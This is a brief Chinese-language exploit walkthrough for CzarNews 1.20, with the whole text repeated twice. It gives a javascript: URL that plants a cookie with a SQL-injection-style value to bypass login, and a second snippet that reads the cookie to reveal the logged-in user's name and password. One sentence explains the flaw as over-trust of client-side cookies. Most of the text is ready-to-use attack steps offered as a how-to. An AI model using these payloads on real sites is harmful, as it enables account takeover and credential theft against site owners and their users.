1. 首先登陆一个CzarNews 1.20 版本的网站。 2. 打开登陆页面,然后在地址栏中输入 ``` javascript:document.cookie="recook=' or ''=',' or ''='";void(0); ``` 随后刷新页面,接下来见证奇迹,你会惊奇的发现你处于了登陆状态。 3. 如果你输入以下代码在URL当中 ``` javascript:c=document.cookie;p=c.substr(c.lastIndexOf('=')+1).split(/%../);a lert("Login: " + p[0] + "\nPass: " + p[1]);void(0); ``` 你会发现你获取了当前登陆用户的账号和密码。 漏洞原因:     网站开发者太过于相信cookie了,导致攻击者在客户端直接修改cookie可以达到伪造用户的目的,造成不可预测的后果。
1. 首先登陆一个CzarNews 1.20 版本的网站。 2. 打开登陆页面,然后在地址栏中输入 ``` javascript:document.cookie="recook=' or ''=',' or ''='";void(0); ``` 随后刷新页面,接下来见证奇迹,你会惊奇的发现你处于了登陆状态。 3. 如果你输入以下代码在URL当中 ``` javascript:c=document.cookie;p=c.substr(c.lastIndexOf('=')+1).split(/%../);a lert("Login: " + p[0] + "\nPass: " + p[1]);void(0); ``` 你会发现你获取了当前登陆用户的账号和密码。 漏洞原因:     网站开发者太过于相信cookie了,导致攻击者在客户端直接修改cookie可以达到伪造用户的目的,造成不可预测的后果。